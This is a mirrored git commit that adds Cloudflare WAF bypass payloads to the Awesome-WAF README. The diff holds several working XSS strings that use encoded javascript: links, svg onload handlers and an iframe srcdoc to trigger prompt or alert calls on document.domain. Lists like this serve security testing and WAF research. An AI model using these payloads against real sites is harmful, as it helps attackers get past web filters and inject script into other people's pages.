mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2025-02-25 17:01:16 -05:00
More waf bypasses for cloudflare
This commit is contained in:
commit
c6521c64f0
10
README.md
10
README.md
@ -2754,6 +2754,16 @@ http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3csc
|
|||||||
```
|
```
|
||||||
|
|
||||||
### Cloudflare
|
### Cloudflare
|
||||||
|
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
|
||||||
|
```
|
||||||
|
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
|
||||||
|
```
|
||||||
|
- XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar)
|
||||||
|
```
|
||||||
|
<svg onload=prompt%26%230000000040document.domain)>
|
||||||
|
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||||
|
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
|
||||||
|
```
|
||||||
- XSS Bypass by [@RakeshMane10](https://twitter.com/rakeshmane10)
|
- XSS Bypass by [@RakeshMane10](https://twitter.com/rakeshmane10)
|
||||||
```
|
```
|
||||||
<svg/onload=alert()//
|
<svg/onload=alert()//
|
||||||
|
Loading…
x
Reference in New Issue
Block a user